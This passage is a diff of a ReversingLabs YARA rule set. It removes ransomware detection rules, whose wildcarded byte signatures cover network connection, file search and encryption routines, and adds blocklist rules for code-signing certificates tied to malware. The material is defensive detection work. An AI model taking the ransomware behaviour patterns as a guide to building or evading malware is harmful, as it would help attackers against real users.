+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CREA&COM d.o.o." and ( pe.signatures [ i ] . serial == "00:dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" or pe.signatures [ i ] . serial == "dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" ) and 1575849600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "7180b20d-f367-5260-88cd-dd2a1269f89b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12744-L12760"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa73ac6569e4bb0084d7b148b2186ec2737a691a133319b21b666aa16bca9f2d"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OF.PL sp. z o.o." and pe.signatures [ i ] . serial == "3d:5e:71" and 1066997730 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Reveton : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Reveton ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "14446b94-cd57-5930-b0af-b21091b61f68"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "fa05113a-a21e-5f21-aae3-b646e5b42dfb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Reveton.yara#L1-L118"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2d316c558cdb5591788ef89c6e20327882a118f2928f4a31fb5b8b3083931ac5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12762-L12780"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b66d67b74d73a143cb5301b232abd5f0f84f058223d4494b924a25dffb49037a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Reveton"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$http_connection_1 = {
-            C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 E8 ?? ?? ?? ?? 50 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 06 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? 8B 45 ?? 50 53 E8 ?? ?? ?? ?? 8B 55 ?? 8B 06 8B 4D ?? E8 ?? ?? ?? ?? 83
-            7D ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
-        }
-		$raw_socket_connection_1_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D
-            ?? 89 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CF E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$raw_socket_connection_1_2 = {
-            C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 80 BD ?? ?? ??
-            ?? ?? 74 ?? 33 C0 EB ?? B0 ?? 84 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 74 ?? 2C ?? 74
-            ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ??
-            ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 95
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? E8
-        }
-		$raw_socket_connection_1_3 = {
-            66 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F B6 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CF
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85
-            C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 40 ?? 8B 00 8B 00
-            89 85 ?? ?? ?? ?? 8A 94 3D ?? ?? ?? ?? 8A 84 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85
-            ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? E8
-        }
-		$raw_socket_connection_1_4 = {
-            8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B
-            00 50 E8 ?? ?? ?? ?? 40 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? 8B 00
-            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B 00 50 E8
-        }
-		$raw_socket_connection_1_5 = {
-            C6 85 ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 66
-            8B 85 ?? ?? ?? ?? 8B D0 66 81 E2 ?? ?? 88 95 ?? ?? ?? ?? 0F B7 C0 C1 E8 ?? 88 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
-            ?? ?? 40 74 ?? B3 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64
-            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? C3
-        }
-		$file_search_1_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 C3 85 DB 74
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 ?? 8B 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 80 38 ?? 75 ??
-            8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8
-        }
-		$file_search_1_2 = {
-            8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 ?? ??
-            ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 8B D0
-            03 D3 42 81 FA ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 50 56 8D 85 ?? ?? ?? ?? 03 C3 50 E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-        }
-		$file_search_1_3 = {
-            8B F0 83 FE ?? 74 ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 53 ??
-            03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 48 50 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$raw_socket_connection_2 = {
-            55 8B EC 83 C4 ?? 53 56 8B F2 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 8D 45 ??
-            33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8B C6 86 E0 66 89 45 ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B C3 E8
-            ?? ?? ?? ?? 83 CB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ??
-            C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SELCUK GUNDOGDU" and ( pe.signatures [ i ] . serial == "00:c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" or pe.signatures [ i ] . serial == "c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" ) and 1426204800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "546692ed-2506-56ad-b678-e74b857380a3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12782-L12798"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ffe25e4478a2245d4e5b330bb9300fb6cb48afb0fe3bd72bd62a589eeee3fe89"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $http_connection_1 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 and $raw_socket_connection_1_1 and $raw_socket_connection_1_2 and $raw_socket_connection_1_3 and $raw_socket_connection_1_4 and $raw_socket_connection_1_5 ) or ( $raw_socket_connection_2 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "World Telecom International Inc." and pe.signatures [ i ] . serial == "6f:c1:43:ba:34:ca:bf:1d:e7:a4:c7:f8:f4:cd:ad:6d" and 1147046400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Janelle : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Janelle ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4fef3be5-8332-5ce2-b1e9-3993e6963331"
-		date = "2021-12-16"
-		modified = "2021-12-16"
+		id = "12664460-19e1-5b73-8299-cfe19dffc0b4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Janelle.yara#L1-L96"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "49f1eac82930606183ab9cf1d5c6c42534d58735876134793e9712e78eb5a4c7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12800-L12816"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "27efaba9bd9cd116f640007c1e951bb77757efbe148b5f953e71d6621d7f16b2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Janelle"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env_p1 = {
-            00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 0A 06 02 7D ?? ??
-            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 08 6F
-            ?? ?? ?? ?? 74 ?? ?? ?? ?? 0D 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 75 ?? ?? ?? ?? 13 ??
-            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 00 16 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 00 16
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 16 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 16 FE 01 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
-            12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 02
-        }
-		$setup_env_p2 = {
-            7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 00 16 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 16 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 16 28 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-            ?? 11 ?? 2C ?? 00 02 17 7D ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ??
-            ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 02
-            7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 00 2A
-        }
-		$find_files = {
-            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 00 00
-            03 28 ?? ?? ?? ?? 0B 00 07 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 02 11 ?? 06 7B ?? ?? ?? ??
-            28 ?? ?? ?? ?? 00 00 09 17 58 0D 09 08 8E 69 32 ?? 06 7B ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
-            00 00 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 7D ?? ??
-            ?? ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 00 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ??
-            8E 69 32 ?? 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE
-            ?? 00 00 DE ?? 26 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A
-        }
-		$encrypt_files = {
-            00 28 ?? ?? ?? ?? 0A 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 28 ?? ?? ??
-            ?? 04 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 08 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
-            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 1A 6F ?? ?? ?? ?? 00 07 06 16 06
-            8E 69 6F ?? ?? ?? ?? 00 07 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 03 19 73 ?? ?? ??
-            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 28 ?? ?? ?? ?? 00 11 ?? 11 ??
-            16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE
-            02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00
-            07 6F ?? ?? ?? ?? 00 00 DC 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Install Sync" and pe.signatures [ i ] . serial == "6a:c6:26:8b:2e:43:1a:2c:13:69:34:6d:17:5d:0e:30" and 1436140800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "b336ff6c-d94e-5715-bb97-6b60cda90911"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12818-L12834"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "41dfe37b464d337268a8bb0e23124df7b50ab966038e8ad33bda81a4d86040ca"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $setup_env_p* ) ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PK Partnership, OOO" and pe.signatures [ i ] . serial == "0f:c4:d9:17:8b:8d:f2:c1:9e:26:9a:c6:f4:3d:d7:08" and 1466553600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cincoo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cincoo ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c7c2773c-5056-5127-8af7-7f5c5a8ea8a1"
-		date = "2022-06-21"
-		modified = "2022-06-21"
+		id = "229772ae-68a2-566b-bf61-988cb41d7d8f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Cincoo.yara#L1-L78"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6a7562cae90754ea75a9fb98ce73ebdb9acf1ad7f28f2240abe6cb592d717ca3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12836-L12854"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1801e7f15bd5f916fc08d263a845d296d334ca9de1040008f619719c1b5c0a3b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
